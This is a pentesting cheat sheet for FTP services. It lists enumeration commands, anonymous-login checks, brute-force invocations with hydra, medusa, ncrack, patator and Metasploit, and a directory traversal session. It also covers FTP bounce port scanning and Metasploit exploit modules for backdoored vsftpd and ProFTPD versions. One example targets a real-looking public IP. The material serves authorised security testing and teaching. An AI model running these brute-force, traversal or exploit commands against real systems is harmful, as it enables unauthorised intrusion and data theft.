FTP Pentesting Best Practices

FTP

FTP usually uses port 21

What is FTP?

FTP (File Transfer Protocol) is used to communicate and transfer files between computers on a TCP/IP (Transmission Control Protocol/Internet Protocol) network, aka the internet. Users, who have been granted access, can receive and transfer files in the File Transfer Protocol server (also known as FTP host/site).

PORT     STATE SERVICE               VERSION
21/tcp   open  ftp                   ProFTPD 1.3.5  

FTP Pentesting

Shodan search query :
port:21
# Anonymous FTP Login query: "220" "230 Login successful." port:21

Banner Grabbing

telnet 10.10.x.x 21
nc -nv 10.10.x.x 21
nmap -sV -p21 --script=banner 10.10.x.x

#Get certificate if any
openssl s_client -connect 10.10.x.x:21 -starttls ftp 

FTP Banner grabbing with nmap banner script

FTP Connection Tools

Linux:

ftp 10.10.x.x
# if FTP server running on different port and using ssl 
ftp-ssl 10.10.x.x 990

Windows:

• Filezilla
• Winscp

Connect to FTP using starttls

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect 10.10.x.x
lftp 10.10.x.x:~> login                       
Usage: login <user|URL> [<pass>]
lftp 10.10.x.x:~> login username Password

Browser Connection

ftp://ftp.xyz.com 
ftp://anonymous:anonymous@10.10.x.x # Anonymous login
ftp://username:password@ftp.secybr.com # To connect to a FTP server requiring a username with Firefox,
ftp://0xhav0c:password@ftp.secybr.com # if my User name was 0xhav0c and my password was password, the FTP browser syntax would be:
ftp://0xhav0c@secybr.com:password@ftp.secybr.com # In some cases, the User name includes a domain name such as 0xhav0c@secybr.com. In these situations, you would type:

Mount remote FTP locally

sudo apt-get install curlftpfs
mkdir /mnt/my_ftp
curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/
curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/ # To allow other users

Download Everything From FTP Server

root@Kali:~/ wget -m --no-passive ftp://anonymous:anonymous@10.10.x.x 
--2022-06-04 21:03:50-- 
ftp://anonymous:*password*@10.10.x.x/ 

=> ‘10.10.x.x/.listing’ 
Connecting to 10.10.x.x:21... connected. 
Logging in as anonymous ... Logged in! 
==> SYST ... done. ==> PWD ... done. 
==> TYPE I ... done. ==> CWD not needed. 
==> PORT ... done. ==> LIST ... done. 
10.10.x.x/.listing [ <=> ] 97 --.-KB/s in 0s 
==> PORT ... done. ==> LIST ... done. 
10.10.x.x/.listing [ <=> ] 97 --.-KB/s in 0s  
2022-06-04 21:03:50 (8.4 MB/s) - ‘10.10.x.x/.listing’ saved [194] 
--2022-06-04 21:03:50-- 
ftp://anonymous:*password*@10.10.x.x/Backups/ 

=> ‘10.10.x.x/Backups/.listing’ 
==> CWD (1) /Backups ... done. 
==> PORT ... done. ==> LIST ... done.

FTP Credentials

It might be helpful to try the passive mode. Sometimes it may allow you to connect in passive mode (ftp -p 192.168.x.x).In Active FTP the FTP client first initiates the control connection from its port N to FTP Servers command port – port 21. The client then listens to port N+1 and sends the port N+1 to FTP Server. FTP Server then initiates the data connection, from its port M to the port N+1 of the FTP Client. But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP. In Passive FTP, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a passv comand. The server then sends the client one of its port number M. And the client initiates the data connection from its port P to port M of the FTP Server.

File upload (PUT FileName.exe) or download (GET FileName.txt; mget FileName.txt) operations can be performed after login. In order for the file to be loaded to be added without being corrupted, the mode must be changed with the “binary” commands if this file is in binary format, and “ascii” commands if it is in ASCII format.

Anonymous Login Check Methods

#Manual Anonymous Login Combos
anonymous : anonymous
anonymous :
ftp : ftp

#Manual Anonymous Login With ftp-ssl
root@secyber.com:~ ftp-ssl -p 88.255.104.161 990
Connected to 88.255.104.161.
220 Service Ready.
Name (88.255.104.161:root): anonymous
234 Enabling TLS Connection
[SSL Cipher ECDHE-RSA-AES256-GCM-SHA384]
502 Not supported
502 Not supported
331 Username ok, need password
Password:
230 User logged in
Remote system type is UNIX.
Using binary mode to transfer files.

#Anonymous Login Check With Metasploit Framework
msf > use auxiliary/scanner/ftp/anonymous
set RHOSTS 10.10.x.x
set RPORT 21
run

#Nmap Script:
nmap --script=ftp-anon -p21 10.10.x.x
#or
nmap -sV -sC -p21 10.10.x.x

Valid Users and Password Detection Methods

msf > use auxiliary/scanner/ftp/ftp_login
set RHOSTS 10.10.x.x
set RPORT 21
set PASS_FILE /usr/share/wordlists/passwords.txt
set USER_FILE /usr/share/wordlists/users.txt
run

#Nmap Script:
nmap --script ftp-brute -p21 10.10.x.x

To connect to FTP, anyone can log in to the server if anonymous login is allowed by the administrator. An attacker can log in anonymously using the metasploit exploit or using the “ftp” tool.

FTP Brute Forcing Methods

hydra -t 2 -L user.list -P passwords.list -M targetIPs.list -s 21 ftp
medusa -t 2 -T 2 -U user.list -P passwords.list -H targetIPs.list -n 21 -M ftp
ncrack -g CL=2 -U user.list -P passwords.list -iL targetIPs.list -p ftp:21 -oA results.txt
patator ftp_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list -x ignore:mesg=’Login incorrect.’ -x ignore,reset,retry:code=500

#Metasploit Framework:
msf > use auxiliary/scanner/ftp/login
set RHOSTS 10.10.x.x
set RPORT 21
set PASS_FILE /usr/share/wordlists/passwords.txt
set USER_FILE /usr/share/wordlists/users.txt
run

Common FTP Vulnerabilities

Directory Traversal Attack

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with “dot-dot-slash (../)” sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

• Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
• Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok
ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

FTP Bounce Vulnerability

The FTP server is vulnerable to FTP bounce attacks. This vulnerability allows an FTP client to instruct the FTP server to make an outbound data connection to any IP and port, rather than restricting outbound connections back to the client’s IP address only. This can be used to map and port scan any networks visible to the FTP server, possibly including internal networks not directly accessible to the attacker.

FTP bouncing is such a popular and easy to exploit reconnaissance attack that tools such as nmap include an FTP bounce scan option.

FTP Bounce Vulnerability Check Method

nmap -sV --script ftp-bounce -p21 10.10.x.x
msf > use auxiliary/scanner/portscan/ftpbounce

Lastly, you can check manually. If your FTP server is impacted from this vulnerability, you will have a result similar to the following:

USER A
331 Username okay, awaiting password
PASS A
230 User logged in, proceed
PORT 172,19,0,100,0,1234
200 The requested action has been successfully completed 
LIST
150 File status okay; about to open data connection // We understood port 1234 is open
226 Closing data connection 
PORT 172,19,0,100,0,4444
200 The requested action has been successfully completed 
LIST
425 No connection established // We understood port 4444 is closed

For example, an attacker using this vulnerability can scan ports in the internal network systems by using the following command:

nmap -v -p 21,22,445,80,443 -b username:password@172.19.0.100 192.168.0.1/24

Unsuccess FTP Bounce scan example output.

Success FTP Bounce scan example output.

Specific Vulnerabilities and Exploits, PoC’s and Nmap Scripts

#OPIE <= 2.4.1-test1 @ FreeBSD 6.4 – 8.1-PRERELEASE [CVE-2010-1938]
nmap --script=ftp-libopie -p21 10.10.x.x

#VSFTPD 2.3.4 [CVE-2011-2523]
nmap --script=ftp-vsftpd-backdoor -p21 10.10.x.x

#ProFTPd 1.3.3c [OSVDB 69562]
nmap --script=ftp-proftpd-backdoor -p21 10.10.x.x

#ProFTPD 1.3.2rc3 – 1.3.3b [CVE-2010-4221]
nmap --script=ftp-vuln-cve2010-4221 -p21 10.10.x.x

#Titan FTP Server <= 8.10.1125 – Directory Traversal [CVE-2010-2426]
msf > use auxiliary/scanner/ftp/titanftp_xcrc_traversal

#PCMan FTP Server 2.0.7 – Directory Traversal [CVE-2015-7601]
msf > use auxiliary/scanner/ftp/pcman_ftp_traversal

#Konica Minolta FTP Utility 1.00 – Directory Traversal [CVE-2015-7603]
msf > use auxiliary/scanner/ftp/konica_ftp_traversal

#BisonFTP Server 3.5 – Directory Traversal [CVE-2015-7602]
msf > use auxiliary/scanner/ftp/bison_ftp_traversal

#ColoradoFTP Server <= 1.3 Build 8 – Directory Traversal [EDB-40231]
msf > use auxiliary/scanner/ftp/colorado_ftp_traversal

#Easy File Sharing FTP Server <= 3.6 – Directory Traversal [CVE-2017-6510]
msf > use auxiliary/scanner/ftp/easy_file_sharing_ftp

#VSFTPD 2.3.4 [CVE-2011-2523]
msf > use exploit/unix/ftp/vsftpd_234_backdoor

#ProFTPD 1.3.2rc3 – 1.3.3b [CVE-2010-4221]
msf > use exploit/linux/ftp/proftp_telnet_iac

#ProFTPD 1.3.3c [OSVDB-69562]
msf > use exploit/unix/ftp/proftpd_133c_backdoor

#ProFTPd 1.3.5 [CVE-2015-3306]
msf > use exploit/unix/ftp/proftpd_133c_backdoor
Exploit-DB: 36742.txt

#Konica Minolta FTP Utility 1.00 – CWD Command Overflow (SEH) [CVE-2015-7768]
Exploit-DB: 39215
msf > use exploit/windows/ftp/kmftp_utility_cwd

Download All Files From FTP Server

wget -m ftp://anonymous:anonymous@10.10.x.x #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.x.x #Download all

Some FTP Commands

USER username PASS password
HELP The server indicates which commands are supported
PORT 127,0,0,1,0,80This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (you need to put the 5th char as “0” and the 6th as the port in decimal or use the 5th and 6th to express the port in hex).
EPRT |2|127.0.0.1|80|This will indicate the FTP server to establish a TCP connection (indicated by “2”) with the IP 127.0.0.1 in port 80. This command supports IPv6.
LIST This will send the list of files in current folder
APPE /path/something.txt This will indicate the FTP to store the data received from a passive connection or from a PORT/EPRT connection to a file. If the filename exists, it will append the data.
STOR /path/something.txt Like APPE but it will overwrite the files
STOU /path/something.txt Like APPE, but if exists it won’t do anything.
RETR /path/to/file A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection
REST 6 This will indicate the server that next time it send something using RETR it should start in the 6th byte.
TYPE i Set transfer to binary
PASV This will open a passive connection and will indicate the user were he can connects